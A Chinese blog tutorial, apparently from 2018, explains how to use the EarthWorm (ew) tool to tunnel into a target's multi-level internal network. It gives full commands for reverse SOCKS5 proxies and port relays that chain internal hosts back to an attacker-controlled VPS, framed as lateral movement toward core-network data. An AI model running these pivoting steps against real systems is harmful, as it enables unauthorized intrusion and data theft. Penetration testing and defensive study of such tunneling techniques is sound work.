您现在的位置:首页 » 知识库 » 系统集成 » 网络维护 网络维护
利用 ew 轻松穿透目标多级内网
发布日期:2018-12-05

0x01 ew 快速穿透目标多级内网:

简要环境说明:

1win2008R2 假设为目标边界web服务器,可正常访问公网假设其公网

2ip 192.168.3.23

3 、假设其内网ip 192.168.32.131

1 win2008 假设为目标内网数据库服务器,可正常访问公网

2、假设其内网ip 192.168.32.170

1win7 假设为自己公网的vps

2 、假设其公网ip 192.168.3.232

1centos 5.1 假设为目标内网的一台linux机器,没有dns不能访问公网

2、 假设其内网ip 192.168.32.169

0x02 首先,利用ew做最简单的正向代理,其实就是大家最常用的所谓的ss:

win2008R2 机器上执行

1# ew_for_Win.exe -s ssocksd -l 1080

win7上打开Proxifier根据上面监听的端口建立正常的socks代理即可

0x03 假设目标机器就直接处在内网[没有公网ip,但可以访问公网],我们也可以利用ew进行反向socks5代理,然后直接在vps上就可以很方便的访问目标内网中的所有机器了:

先在 win7上执行,等待目标反弹连接

1# ew_for_Win.exe -s rcsocks -l 1080 -e 1234

win2008上执行,反弹socks5连接

1# ew_for_Win.exe -s rssocks -d 192.168.3.232 -e 1234

0x04 实现复杂内网环境下的跨网段多级穿透:

第一种场景,内网机器不能访问公网,可通过能访问公网的机器把内网不能访问公网机器带出来,比较简单,如下:

1、假设win2008处在目标内网且不能访问公网但可以访问内网中的资源

2、而win2008R2这台机器上虽然有内网ip,但不能访问内网资源,好在win2008R2可以访问win2008

3、这时我们想获取内网资源就可以这样干,先在win2008上开启socks代理服务,然后再在DMZwin2008R2连上内网的win2008socks服务

4 、最后,通过win2008上的socks服务我们就可以轻松访问目标内网中的各种资源了,具体实现过程如下

首先,win2008上执行,意思就是在本地建立socks5代理,端口为1080

1# ew_for_Win.exe -s ssocksd -l 1080

在到DMZwin2008R2上执行,意思就是把来自外部的1090端口的流量转到内网192.168.32.170这台机器的1080端口上

1# ew_for_Win.exe -s lcx_tran -l 1090 -f 192.168.32.170 -g 1080

最后,再回到win7[vps]上去利用Proxifier建立正常的socks代理访问1090端口即可,访问vps1090就相当于访问内网win20081080端口

第二种场景,还是有些机器不能访问公网的情况:

1、假设win2008在内网且能访问公网但不能访问内网资源,centos 5.1能访问内网资源但却无法访问公网,win2008可以访问centos 5.1

2、这试,我们要想获取内网资源,就可以通过win2008centos 5.1win7[vps]之间建立一条socks5通道,实现过程比较简单,如下

首先,win7[实际中的vps]上执行,把来自外部的1080端口的流量转到本地的1379端口上

1# ew_for_Win.exe -s lcx_listen -l 1080 -e 1379

此时回到centos 5.1上执行,在本地启动socks5代理并监听2345端口

1# chmod +x ew_for_Linux32

2# ./ew_for_Linux32 -s ssocksd -l 2345

然后再到win2008上去执行,意思就是把win7[vps]1379端口和centos 5.12345进行绑定,即建立socks5通道

1# ew_for_Win.exe -s lcx_slave -d 192.168.3.232 -e 1379 -f 192.168.32.169 -g 2345

最后,在回到win7[vps]建立正常的socks代理访问即可,实际上就相当于访问win71080就相当于访问centos 5.12345端口,通过这种方式一样也可以把整个目标内网代理出来

第三种场景,多级内网轻松穿透:

1、假设win2008R2在内网[无公网ip]并在一个独立的内网段,win2008也处在目标内网,假设在另一个内网段,centos 5.1同样也处在内网,可又在另一个单独的内网段

2、且win2008R2能访问win2008,win2008能访问centos 5.1,centos 5.1能访问目标核心网,要实现层层穿透,访问到核心网资源,我们就可以这样

先在win7[vps]上执行,把来自外部的1080端口流量转到本地的1235端口上

1# ew_for_Win.exe -s rcsocks -l 1080 -e 1235

win2008R2上执行,win7[vps]1235端口和内网win20083456端口绑定

1# ew_for_Win.exe -s lcx_slave -d 192.168.3.232 -e 1235 -f 192.168.32.170 -g 3456

win2008上执行,将来自外部的1236端口和本地的3456端口进行绑定

1# ew_for_Win.exe -s lcx_listen -l 3456 -e 1236

centos 5.1上执行,将本地的socks连接反弹到win20081236端口上,此时再回到win2008上看会提示”rssocks cmd_socket OK!,说明通道已经建立成功

1# ./ew_for_Linux32 -s rssocks -d 192.168.32.170 -e 1236

最后,再回到win7[vps]上利用Proxifier访问本地的1080就相当于访问centos 5.11236端口,即可轻松获取核心网的数据

一点小结:

关于ew,想必经常搞内网的朋友,都已经非常熟练了,这里也就不废话了,其实,关于ew本身在实战中还是比较实用的,在此也非常感谢作者的无私贡献,真心希望国内能多一些这样的人,总体来讲,在工具使用上并没有太多技术含量,关键还是要你自己根据目标的实际内网环境仔细弄清楚数据流向再针对性的用,上面一些简单应用场景中,表面看着貌似挺复杂的,其实真正理解以后,都非常简单,深刻搞清楚这些最基本的东西你才有可能灵活应用,什么都是如此,总是停留在’用’别人的工具上,自己没有一点儿的独立分析和想法,是很难有长进的,后续有空会再简单介绍下关于Termite跳板机使用

 

 

  • 1.公司登记注册于2003年1月27日,清远市桑达电子网络媒体有限公司
    2.公司2006年起成为清远市政府定点协议供货商,电子采购供货商
    3.公司2007年被清远市相关政府部门评为安防行业状元
    4.公司2007年起成为长城电脑清远如意服务站(SP368)
    5.公司2007年承建清远市横河路口电子警察工程,开创清远电子警察先河。
  • 6.公司2007年起成为IBM合作伙伴、公司2010年底成为金蝶软件清远金牌代理(伙伴编号:30030013)
    7.公司组团队参加南方都市报组织的创富评选,获广东80强。公司申请多项软件著作权、专利权
    8.2016年起公司成为粤东西北地区为数不多的双软企业,确立“让软件驱动世界,让智能改变生活!"企业理想
    9.2016-01-29更名为广东互动电子网络媒体有限公司
    10.2021-01-13更名为广东互动电子有限公司
  • 投资合作咨询热线电话:0763-3391888 3323588
  • 做一个负责任的百年企业! 天行健,君子以自强不息;地势坤,君子以厚德载物;
    为用户创造价值! 让软件驱动世界; 让智能改变生活; 超越顾客期望,帮助顾客成功;
    对客户负责,对员工负责,对企业命运负责!帮助支持公司的客户成功;帮助忠诚于公司的员工成功!
  • 联系电话:0763-3391888 3323588 3318977
    服务热线:18023314222 QQ:529623964
  • 工作QQ:2501204690 商务QQ: 602045550
    投资及业务投诉QQ: 529623964
    微信:小米哥 微信号:qysed3391888
    腾讯微博:桑达网络-基石与起点
  • E-MAIL:222#QYSED.CN ok3391888#163.com (请用@替换#)
在线客服
  • 系统集成咨询
    点击这里给我发消息
  • 网站\微信\软件咨询
    点击这里给我发消息
  • 售后服务
    点击这里给我发消息
  • 投资合作
    点击这里给我发消息